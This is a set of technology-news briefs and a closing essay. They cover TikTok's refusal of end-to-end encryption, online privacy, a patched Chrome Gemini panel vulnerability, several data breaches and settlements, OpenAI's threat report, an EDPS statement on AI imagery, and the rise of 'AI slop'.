TikTok rejects end-to-end encryption citing safety concerns

TikTok will not adopt end-to-end encryption for direct messages. The company explained that using this technology could hinder safety teams’ and law enforcement’s efforts to detect harmful content in private messages, which the company believes could make users less safe online.

Encrypted messaging ensures that only the sender and recipient can read a conversation and is widely used across the social media industry. Rivals including Facebook, Instagram, Messenger, and X have adopted the technology, saying protecting private communication is central to user privacy.

The issue has become more sensitive because the platform has long faced scrutiny over possible links between its parent company, ByteDance, and the government of the People’s Republic of China, something the company has repeatedly denied. Reflecting these concerns, earlier this year, US lawmakers ordered the separation of TikTok’s US operations from its global business.

The company told the BBC that encrypted messaging would make it impossible for police and platform safety teams to read direct messages when needed. TikTok emphasised that this decision was made to enhance user protection, with a particular focus on the safety of younger users, and that it sees monitoring capabilities as crucial for addressing harmful behaviour.

Industry analyst Matt Navarra said the platform’s decision to ‘swim against the tide’ is ‘notable’ but presents ‘challenging optics’. He noted, ‘Grooming and harassment risks are present in DMs [direct messages], so TikTok can state it is prioritising proactive safety over privacy absolutism,’ though he added that the decision ‘places TikTok out of alignment with global privacy expectations’.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Online privacy faces new pressures in the age of social media

Online privacy is eroding as digital services collect ever-growing personal data and surveillance becomes part of daily technology use. The debate has intensified as social media platforms, advertisers, and connected devices expand their ability to track behaviour, preferences, and habits.

Analysts say younger generations have adapted to this reality rather than resisting it. ‘In 2026, online privacy is a luxury, not a right,’ says Thomas Bunting, an analyst at the UK innovation think tank Nesta. He argues many people have grown up accepting data collection as a trade-off for access to online services, noting: ‘We’ve been taught how to deal with it.’

Advocates warn that the erosion of online privacy could have wider social consequences. Cybersecurity expert Prof Alan Woodward from the University of Surrey says the issue goes beyond personal privacy. ‘People should care about online privacy because it shapes who has power over their lives,’ he says, arguing that privacy is ‘about having something to protect: freedom of thought, experimentation, dissent and personal development without permanent surveillance.’

Despite a growing number of privacy tools and regulations, data exposure remains widespread. According to Statista, more than 1.35 billion people were affected by data breaches, hacks, or exposure in 2024 alone. At the same time, more than 160 countries now have privacy legislation, while users regularly encounter cookie consent prompts that govern how their data is collected online.

Experts say frustration with privacy controls reflects a broader ‘privacy paradox’, in which people express concern about data protection but rarely change their behaviour. Cisco’s Consumer Privacy Survey found that while 89% of respondents said they care about privacy, only 38% actively take steps to protect their data.

As philosopher Carissa VĂ©liz notes, the challenge is not simply awareness but a sense of agency: ‘Mostly, people don’t feel like they have control.’ She argues that protecting privacy requires stronger regulation, responsible technology design, and cultural change, adding: ‘It’s about having [access to] the right tech, but also using it.’

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Chrome Gemini vulnerability allowed camera and file access

A high-severity vulnerability in Chrome’s integrated Gemini AI assistant exposed users to the potential activation of the camera and microphone, local file access, and phishing attacks. The issue, tracked as CVE-2026-0628, was disclosed by Palo Alto Networks’ Unit 42 and patched by Google in January 2026.

Gemini Live operates as a privileged AI panel embedded within the browser, capable of web page summarisation and task automation. To enable multimodal functionality, the panel is granted elevated permissions, including access to screenshots, local files, and device hardware.

Researchers identified inconsistent handling of the declarativeNetRequest API when gemini.google.com was loaded inside the AI side panel rather than a standard browser tab. While extensions could inject JavaScript in both cases, the panel context inherited browser-level privileges.

A malicious extension exploiting this distinction could hijack the trusted panel and execute arbitrary code with elevated access. Potential impacts included silent activation of a camera or microphone, screenshot capture, local file exfiltration, and high-credibility phishing attacks.

Google released a fix on 5 January 2026 following responsible disclosure. Users running the latest version of Chrome are protected, and organisations are advised to ensure updates are applied across all endpoints.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Deutsche Telekom and Nokia advance open and AI-native RAN

Nokia and Deutsche Telekom have expanded their collaboration to advance cloud-based, disaggregated, and AI-native RAN technologies. The strengthened Innovation Cooperation Program deepens joint work in Cloud RAN, open interfaces, and next-generation solutions.

The partnership builds on years of cooperation focused on open and flexible architectures. Both companies said the expanded effort aims to improve network efficiency, programmability, and long-term operational value for service providers.

Work on Open Fronthaul integration is being intensified following earlier multivendor deployments in Germany linking Nokia baseband units with O-RAN-compliant radios. Additional integrations covering Open Fronthaul and Cloud RAN are progressing within confidential development programmes.

The companies are also advancing O-RAN-aligned management capabilities through open O1 interfaces and deeper integration of configuration management. A vendor-independent Service Management and Orchestration platform remains central to Deutsche Telekom’s multivendor RAN strategy.

Nokia will act as Deutsche Telekom’s strategic co-creation partner for AI-native RAN development. Joint efforts will focus on AI-powered receivers, adaptive beamforming, predictive optimisation, and lab and field validation to support intelligent, autonomous mobile networks.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Anthropic’s Claude climbs past ChatGPT in downloads

App Store charts have shifted sharply in the consumer AI market, with Anthropic’s Claude now surpassing ChatGPT in downloads. The change marks one of the most notable ranking reversals in recent months.

The spike in downloads appears tied to public reaction rather than new product features. App rankings often fluctuate, but this shift coincides with growing debate over how AI companies collaborate with governments.

Anthropic has positioned Claude around strict usage policies, including restrictions on domestic surveillance and lethal autonomous weapons. That stance has resonated with users concerned about the ethical deployment of AI technologies.

Claude’s ascent underscores a more competitive chatbot landscape in which transparency and public confidence are playing an increasingly important role. AI app rankings are becoming increasingly volatile as users are willing to switch platforms.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

AT&T data breach settlement wins preliminary approval in $177 million deal

A federal judge in Texas has preliminarily approved a $177 million settlement resolving claims that AT&T failed to safeguard consumer data in two separate breaches. The company denies wrongdoing but agreed to establish compensation funds covering affected customers nationwide.

The agreement creates two non-reversionary funds: $149 million for individuals whose personal data appeared on the dark web, and $28 million for customers whose call and text logs were accessed. It covers a March 2024 breach and a separate incident between May 2022 and early 2023.

Eligible class members may submit claims for cash payments, with amounts depending on the number of valid submissions, and may also receive up to 24 months of credit monitoring. The deadline to opt out or object is 17 October 2025, with a final approval hearing set for 3 December 2025.

Legal and administrative costs, attorneys’ fees, and service awards will be paid from the settlement funds. The case resolves claims brought on behalf of all living US residents whose data was exposed in the two AT&T breaches.

The settlement follows other recent legal challenges facing AT&T, including class actions filed by New York pensioners alleging the company misled investors about the environmental impact of its lead-sheathed cables.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

AI misuse exposed as OpenAI details global disinformation and scam networks

OpenAI said criminal and state-linked groups misused ChatGPT for disinformation, scams and covert influence. Its latest threat report details coordinated account bans and highlights how AI tools are embedded within broader operational workflows rather than used in isolation.

One investigation linked accounts to Chinese law enforcement engaged in what were described as ‘cyber special operations’. Activities included planning influence campaigns, mass-reporting dissidents and drafting forged materials, with related efforts continuing through other tools despite model refusals.

The report also outlined a Cambodia-based romance scam targeting young men in Indonesia through a fake dating agency. Operators combined manual prompting with automated chatbots to sustain conversations and facilitate financial fraud, leading to account removals.

Separately, accounts tied to Russia’s ‘Rybar’ network used ChatGPT to draft and translate posts distributed across multiple platforms. OpenAI noted that campaign impact depended more on account reach and coordination than on AI-generated content alone.

Across China, Russia and parts of Southeast Asia, actors treated AI as one tool among many, alongside fake profiles, paid advertising and forged documents. OpenAI called for cross-industry vigilance, stressing the need to analyse behavioural patterns across platforms.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

CarGurus data leak surfaces as ShinyHunters publishes archive

The ShinyHunters extortion group has published a 6.1GB archive, which it claims contains more than 12 million records stolen from CarGurus, a US-based automotive platform. Have I Been Pwned listed the dataset, reporting that roughly 3.7 million records appear to be new.

The exposed information includes email addresses, IP addresses, full names, phone numbers, physical addresses, user account IDs, and finance-related application data belonging to CarGurus users. Dealer account details and subscription information were also reportedly included in the archive.

CarGurus has not issued a public statement confirming a breach. However, Have I Been Pwned said it attempts to verify the authenticity of datasets before adding them to its database, suggesting a level of validation of the leaked material.

Security experts warn that the availability of the data could increase the risk of phishing. Users are advised to remain cautious of unsolicited communications and potential scams that may leverage the exposed personal information.

ShinyHunters has recently claimed attacks against multiple large organisations across telecoms, fintech, retail, and media. The group is known for using social engineering tactics, including voice phishing and malicious OAuth applications, to gain access to SaaS platforms and extract customer data.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

EDPS and regulators unite to address misuse of AI imagery across jurisdictions

The European Data Protection Supervisor (EDPS) and authorities from 61 jurisdictions issued a joint statement on AI-generated imagery, warning about tools that create realistic depictions of identifiable individuals without consent. The move underscores concerns over privacy, dignity and child safety.

Authorities said advances in AI image and video tools, especially when integrated into social media platforms, have enabled non-consensual intimate imagery, defamatory depictions, and other harmful content. Children and vulnerable groups are seen as particularly at risk.

The EDPS and the other signatories reminded organisations that AI content-generation systems must comply with applicable data protection and privacy laws. They stressed that creating non-consensual intimate imagery may constitute a criminal offence in many jurisdictions.

Organisations are urged to implement safeguards against misuse of personal data, ensure transparency about system capabilities and uses, and provide accessible mechanisms for swift content removal. Stronger protections and age-appropriate information are expected where children are involved.

Authorities signalled plans for coordinated responses, including enforcement, policy development and education initiatives. The EDPS and fellow signatories urged organisations to engage proactively with regulators and ensure innovation does not undermine fundamental rights.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

AI slop’s meteoric rise and the impact of synthetic content in 2026

In December 2025, the Macquarie Dictionary, Merriam-Webster, and the American Dialect Society named ‘slop’ as the Word of the Year, reflecting a widespread reaction to AI-generated content online, often referred to as ‘AI slop.’ By choosing ‘slop’, typically associated with unappetising animal feed, they captured unease about the digital clutter created by AI tools.

As LLMs and AI tools became accessible to more people, many saw them as opportunities for profit through the creation of artificial content for marketing or entertainment, or through the manipulation of social media algorithms. However, despite video and image generation advances, there is a growing gap between perceived quality and actual detection: many overestimate how easily AI content evades notice, fueling scepticism about its online value.

As generative AI systems expand, the debate goes beyond digital clutter to deeper concerns about trust, market incentives, and regulatory resilience. How will societies manage the social, economic, and governance impacts of an information ecosystem increasingly shaped by automated abundance? In simplified terms, is AI slop more than a simple digital nuisance, or do we needlessly worry about a transient vogue that will eventually fade away?

The social aspect of AI slop’s influence

The most visible effects of AI slop emerge on large social media platforms such as YouTube, TikTok, and Instagram. Users frequently encounter AI-generated images and videos that appropriate celebrity likenesses without consent, depict fabricated events, or present sensational and misleading scenarios. Comment sections often become informal verification spaces, where some users identify visual inconsistencies and warn others, while many remain uncertain about the content’s authenticity.

However, no platform has suffered the AI slop effect as much as Facebook, and once you take a glance at its demographics, the pieces start to come together. According to multiple studies, Facebook’s user base is mostly populated by adults aged 25-34, but users over the age of 55 make up nearly 24 percent of all users. While seniors do not constitute the majority (yet), younger generations have been steadily migrating to social platforms such as TikTok, Instagram, and X, leaving the most popular platform to the whims of the older generation.

Due to factors such as cognitive decline, positivity bias, or digital (il)literacy, older social media users are more likely to fall for scams and fraud. Such conditions make Facebook an ideal place for spreading low-quality AI slop and false information. Scammers use AI tools to create fake images and videos about made-up crises to raise money for causes that are not real.

The lack of regulation on Meta’s side is the most glaring sore spot, evidenced by the company pushing back against the EU’s Digital Services Act (DSA) and Digital Markets Act (DMA), viewing them as ‘overreaching‘ and stifling innovation. The math is simple: content generates engagement, resulting in more revenue for Facebook and other platforms owned by Meta. Whether that content is authentic and high-quality or low-effort AI slop, the numbers don’t care.

The economics behind AI slop

At its core, AI content is not just a social media phenomenon, but an economic one as well. GenAI tools drastically reduce the cost and time required to produce all types of content, and when production approaches zero marginal cost, the incentive to churn out AI slop seems too good to ignore. Even minimal engagement can generate positive returns through advertising, affiliate marketing, or platform monetisation schemes.

AI content production goes beyond exploiting social media algorithms and monetisation policies. SEO can now be automated at scale, thus generating thousands of keyword-optimised articles within hours. Affiliate link farming allows creators to monetise their products or product recommendations with minimal editorial input.

On video platforms like TikTok and YouTube, synthetic voice-overs and AI-generated visuals are on full display, banking on trending topics and using AI-generated thumbnails to garner more views on a whim. Thanks to AI tools, content creators can post relevant AI-generated content in minutes, enabling them to jump on the hottest topics and drive clicks faster than with any other authentic content creation method.

To add salt to the wound, YouTube content creators share the sentiment that they are victims of the platform’s double standards in enforcing its strict community guidelines. Even the largest YouTube Channels are often flagged for a plethora of breaches, including copyright claims and depictions of dangerous or illegal activities, and harmful speech, to name a few. On the other hand, AI slop videos seem to fly under YouTube’s radar, leading to more resentment towards AI-generated content.

Businesses that rely on generative AI tools to market their services online are also finding AI to be the way to go, as most users are still not too keen on distinguishing authentic content, nor do they give much importance to those aspects. Instead of paying voice-over artists and illustrators, it is way cheaper to simply create a desired post in under a few minutes, adding fuel to an already raging fire. Some might call it AI slop, but again, the numbers are what truly matter.

The regulatory challenge of AI slop

AI slop is not only a social and economic issue, but also a regulatory one. The problem is not a single AI-generated post that promotes harmful behaviour or misleading information, but the sheer scale of synthetic content entering digital platforms. When large volumes of low-value or deceptive material circulate on the web, they can distort information ecosystems and make moderation a tough challenge. Such a predicament shifts the focus from individual violations to broader systemic effects.

In the EU, the DSA requires very large online platforms to assess and mitigate the systemic risks linked to their services. While the DSA does not specifically target AI slop, its provisions on transparency, content recommendation algorithms, and risk mitigation could apply if AI content significantly affects public discourse or enables fraud. The challenge lies in defining when content volume prevails over quality control, becoming a systemic issue rather than isolated misuse.

Debates around labelling AI slop and transparency also play a large role. Policymakers and platforms have explored ways to flag AI-generated content throughout disclosures or watermarking. For example, OpenAI’s Sora generates videos with a faint Sora watermark, although it is hardly visible to an uninitiated user. Nevertheless, labelling alone may not address deeper concerns if recommendation systems continue to prioritise engagement above all else, with the issue not only being whether users know the content is AI-generated, but how such content is ranked, amplified, and monetised.

More broadly, AI slop highlights the limits of traditional content moderation. As generative tools make production faster and cheaper, enforcement systems may struggle to keep pace. Regulation, therefore, faces a structural question: can existing digital governance frameworks preserve information quality in an environment where automated content production continues to grow?

Building resilience in the era of AI slop

Humans are considered the most adaptable species on Earth, and for good reason. While AI slop has exposed weaknesses in platform design, monetisation models, and moderation systems, it may also serve as a catalyst for adaptation. Unless regulatory bodies unite under one banner and agree to ban AI content for good, it is safe to say that synthetic content is here to stay. However, sooner or later, systemic regulations will evolve to address this new AI craze and mitigate its negative effects.

The AI slop bubble is bound to burst at some point, as online users will come to favour meticulously crafted content – whether authentic or artificial over low-quality content. Consequently, incentives may also evolve along with content saturation, leading to a greater focus on quality rather than quantity. Advertisers and brands often prioritise credibility and brand safety, which could encourage platforms to refine their ranking systems to reward originality, reliability, and verified creators.

Transparency requirements, systemic risk assessments, and discussions around provenance disclosure mechanisms imply that governance is responding to the realities of generative AI. Instead of marking the deterioration of digital spaces, AI slop may represent a transitional phase in which platforms, policymakers, and users are challenged to adjust their expectations and norms accordingly.

Finally, the long-term outcome will depend entirely on whether innovation, market incentives, and governance structures can converge around information quality and resilience. In that sense, AI slop may ultimately function less as a permanent state of affairs and more as a stress test to separate the wheat from the chaff. In the upcoming struggle between user experience and generative AI tools, the former will have the final say, which is an encouraging thought.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!